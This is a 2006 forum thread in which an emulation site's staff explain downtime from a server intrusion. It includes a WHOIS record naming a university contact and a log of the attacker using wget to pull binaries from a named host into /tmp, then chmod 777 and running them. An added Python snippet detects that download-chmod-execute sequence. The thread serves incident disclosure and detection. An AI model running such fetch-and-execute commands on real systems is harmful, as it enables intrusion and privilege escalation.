Alpha Posted April 11, 2006

Sorry for the 1 day downtime; we had some hacker trouble yesterday afternoon. Apparently they thought they were smart enough to overtake the entire server, but they had no idea who they were messing with.

There shouldn't be any more downtime for a while as we have patched up the server. Currently, we are hoping to get our own dedicated server, but we're short on money. If you can DONATE, that would be much appreciated.

Regards,
1Emulation Staff

»» Donate to 1Emulation Servers

sammaz Posted April 11, 2006

wtf who has a beef with 1 emu?

garyoak99 Posted April 11, 2006

Thanks for the update! I'm just glad the forum is back!

someboddy Posted April 11, 2006

> wtf who has a beef with 1 emu?

We are not sure the attack was against 1Emulation. There are other sites on this server.

Alpha (Author) Posted April 11, 2006

> > wtf who has a beef with 1 emu?
> We are not sure the attack was against 1Emulation. There are other sites on this server.

From the looks of it, we were affected the worst. So it could have very well been us, but we won't be able to know for certain.

Weirdy Posted April 11, 2006

Was it some kind of F5 terrorist? Perhaps it could've been our good ol' friend Eugene.

Edited April 11, 2006 by Weirdy

fischju Posted April 11, 2006

Did you ban any1 recently that seemed 1337 in any way? And F5 is old... I like to find files hosted on a server and download and delete them with a script and leave it on overnight..... not that I would do that to you guys..... just saying

Alpha (Author) Posted April 11, 2006

> Did you ban any1 recently that seemed 1337 in any way? And F5 is old... I like to find files hosted on a server and download and delete them with a script and leave it on overnight..... not that I would do that to you guys..... just saying

I haven't banned anyone since January. And I haven't a sign of the guy I banned anywhere. He didn't seem 1337 either, only a proxy-tard.

miskie Posted April 11, 2006

Hacker report:

The hacker's last IP address before getting into the server was 147.46.127.205. This is the data I can pull on it:

    # ENGLISH
    KRNIC is not an ISP but a National Internet Registry similar to APNIC.
    The followings is organization information that is using the IPv4 address.

    IPv4 Address       : 147.46.0.0-147.46.255.255
    Network Name       : NET-SNU
    Registration Date  : 20040625
    Publishes          : Y

    [ Organization Information ]
    Organization ID    : ORG384075
    Org Name           : Seoul National University
    Address            : Sillim9-dong, Gwanak-gu, Seoul
    Detail address     : San56-1Beonji Jungangjeonsanwon
    Zip Code           : 151-742

    [ Technical Contact Information ]
    Name               : Eunjoo Jung
    Org Name           : Seoul National University
    Address            : Sillim9-dong, Gwanak-gu, Seoul
    Detail address     : San56-1Beonji Jungangjeonsanwon
    Zip Code           : 151-742
    Phone              : +82-2-880-5380
    E-Mail             : ********@plaza.snu.ac.kr

Once they got in thru this exploit

    http://www.google.com/search?hl=en&q=Psych...G=Google+Search

their IP became 127.0.0.1 and their username apache.

Here's some log data of what they did once inside, pretending to be apache.

-- here the user is downloading crap into the server's TMP folder --

    --16:51:24-- http://xpl.netmisphere2.com/r0nin
               => `r0nin'
    Resolving xpl.netmisphere2.com... done.
    Connecting to xpl.netmisphere2.com[82.237.120.143]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 19,258 [application/x-executable]

        0K..................                                   100%   45.98 KB/s

    16:51:25 (45.98 KB/s) - `r0nin' saved [19258/19258]

And here is some other stuff they ran before I caught them:

    finger
    cd /tpm
    cd /tmp
    wget http://xpl.netmisphere2.com/brk2
    chmod 777 brk2
    ./brk2
    wget http://xpl.netmisphere2.com/uselib24
    chmod 777 uselib24
    ./uselib24
    ./uselib24
    id
    ./uselib24

Though this looks bad, this kind of hack is more of a PITA than a security-threatening one - they disrupted the server and apparently banged the hell out of 1emulation's database -- I can't be sure if it was directed or not (since once they were in they 'became' apache -- which the server doesn't see as a threat) at 1emulation specifically, or if this site was just chosen at random.

Anyway, all the code has been deleted, the exploits have been plugged. I've been watching the server for the last couple of hours and there is nothing going on of interest at all.
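
Added example (not part of the original thread, and not tooling miskie used): a small Python check that replays the command history quoted in the post above and flags the download, chmod, execute sequence it shows. The function name and the list of world-writable directories are assumptions made for this illustration.

```python
import posixpath
import shlex

# Command history exactly as quoted in the post above, one command per line.
HISTORY = """finger
cd /tpm
cd /tmp
wget http://xpl.netmisphere2.com/brk2
chmod 777 brk2
./brk2
wget http://xpl.netmisphere2.com/uselib24
chmod 777 uselib24
./uselib24
./uselib24
id
./uselib24""".splitlines()
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed list for this example


def find_fetch_chmod_exec(history, start_dir="/"):
    """Flag files that one session downloaded, chmod'ed and then executed."""
    cwd, fetched, made_exec, findings = start_dir, {}, set(), {}

    def resolve(path):
        return posixpath.normpath(posixpath.join(cwd, path))

    for line in history:
        argv = shlex.split(line)
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        if cmd == "cd" and args:
            # History does not record whether a cd succeeded ("cd /tpm" here),
            # so the tracked directory is simply the last one requested.
            cwd = resolve(args[0])
        elif cmd == "wget":
            # Assumes wget's default: save under the URL basename in cwd.
            for url in (a for a in args if "://" in a):
                fetched[resolve(posixpath.basename(url))] = url
        elif cmd == "chmod":
            made_exec.update(p for p in map(resolve, args[1:]) if p in fetched)
        elif "/" in cmd and resolve(cmd) in made_exec:
            path = resolve(cmd)
            hit = findings.setdefault(path, {
                "path": path, "url": fetched[path], "runs": 0,
                "world_writable": path.startswith(WORLD_WRITABLE)})
            hit["runs"] += 1
    return list(findings.values())
```

Run over process-accounting or audit records for the web server account, the same sequence check surfaces this pattern even though, as the post notes, the activity appears to come from apache on 127.0.0.1.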

Agozer Posted April 11, 2006

Well, things are back to normal. Let's resume our daily forum activities.

CJ Jackson Posted April 11, 2006

That explains the earlier MySQL error "Too Many Connections", this is just criminal.